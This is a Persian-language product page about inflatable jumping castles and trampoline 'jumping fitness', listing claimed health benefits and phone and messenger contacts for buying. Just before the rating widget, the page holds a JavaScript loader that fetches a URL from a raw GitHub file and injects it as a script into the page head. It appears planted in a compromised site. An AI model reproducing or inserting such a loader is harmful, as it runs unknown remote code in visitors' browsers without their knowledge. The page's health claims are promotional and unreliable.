جامپینگ بادی چیست؟
جامپینگ بادی چیست؟

جامپینگ بادی چیست؟

  • جامپینگ بادی به سازه هایی گفته می شود که به صورت تشک مانند برای استفاده کودکان و ورزشکاران استفاده می شود.

    جامپینگ بادی در کجا استفاده می شود

    معمولا این محصولات محدودیتی برای جا ندارد. این دستگاه میتواند در مهدکودک ها، خانه بازی ها، شهر بازی ها و گاهی در خانه استفاده گردد. معمولا این محصولات ارتفاع بین 2.8 تا ۳ متر را دارد. و اگر در خانه خود یک حیاط کوچک داشته باشید میتوانید ان را استفاده کنید. بپر بپر می توان در شهرک های بادی استفاده کرد شاید برای شما سوال پیش آید که شهرک بادی دیگر چیست؟ به مجموعه ترکیبی قلعه بادی ( سرسره بادی )، چامپینگ بادی و استخره توپ بادی گفته می شود.

    فواید جامپینگ فیتنس (Jumping Fitnes)

    جامپینگ فیتنس که با نام ترامپولین نیز شهرت جهانی پیدا کرده در گذشته به منظور ابزاری در جهت تقویت انعطاف پذیری بدن و افزایش چابکی ورزشکاران ژیمناستیک کار مورد استفاده قرار می گرفت و با توجه به فواید و مزایای تمرینی که از جامپینگ بروز پیدا کرد از این وسیله در جهت تمرین فضا نوردان نیز بهره گرفته شد و امروزه این وسیله با نام جامپینگ فیتنس خود نمایی می کند.

    به طور کلی فواید ورزش جامپینگ فیتنس را میتوان در:

    • کالری سوزی و رسیدن به تناسب اندام
    • ترشح هورمون اندروفین و ایجاد نشاط و شادی و برطرف نمودن افسردگی
    • تقویت ماهیچه های مرکزی بدن
    • بالا بردن تراکم استخوانها
    • بهبود و تقویت سیستم قلبی – عروقی بدن
    • بر طرف کننده چربی های انباشته شده در بدن (سلولیت) با متابولسیم بالا
    • بهبود رشد جسمی و فکری در کودکان
    • افزایش سیستم ایمنی بدن و بهبود حافظه و تمرکز مغز
    • و بسیاری مواردی دیگر دانست.

    همگی می دانیم که جامپینگ بادی سرگرم کننده و لذت بخش است. کنترل کردن خنده ی خود در حین پریدن این بازی کودکانه بسیار سخت است. اما آیا می دانستید که انجام عادی فعالیت ورزشی ترامپولین، فواید و مزایای مهمی برای سلامتی شما دارد؟ به علاوه، جامپینگ فواید ذهنی زیادی برای کودکان نیز دارد. پریدن روی جامپینگ باعث ایجاد تغییر مداوم در مرکز ثقل می شود، که کودکان با تغییر موقعیت و حرکات دو جانبه ی خود، سریعاً به آن واکنش نشان می دهند. این امر به معنای ترکیبی از پرش، حفظ تعادل و تمرکز است و به تمامی کودکان کمک می کند تا مهارت های حرکتی، تعادل و هماهنگی خود را به یک باره بهبود بخشند.

    جامپینگ فیتنس (Jumping Fitnes) چیست؟

    ورزش جامپینگ بادی فیتنس را می توان نوعی تمرین تناسب اندام پویا تعریف نمود که مجموعه ای از حرکات ریتمیک و پرهیجان را در خود جای داده که حرکات تمرینی آن به وسیله ترامپولین انجام می شود. امروزه این ورزش در جهان به صورت علمی و آکادمیک در باشگاه های مخصوص این ورزش به علاقمندان ورزش های پر هیجان آمورزش داده می شود. تمرینات جامپینگ فیتنس همانند بسیاری از ورزش ها به صورت گروهی و همراه با موزیک های ریتمیک و هیجان بر انگیز انجام می شود.

    نحوه خرید جامپینگ بادی

    برای خرید محصول بپر بپر می توانید با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل نمایید. همچنین جهت خرید می توانید از طریق راه های ارتباطی تلگرام، واتساپ، ایتا و شبکه های اجتماعی دیگر درخواست خود را جهت خرید به پشتیبانی ما ارائه نمایید. همچنین جهت مشاهده محصولات این دسته می توانید جامپینگ بادی همین سایت مراجعه نمایید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید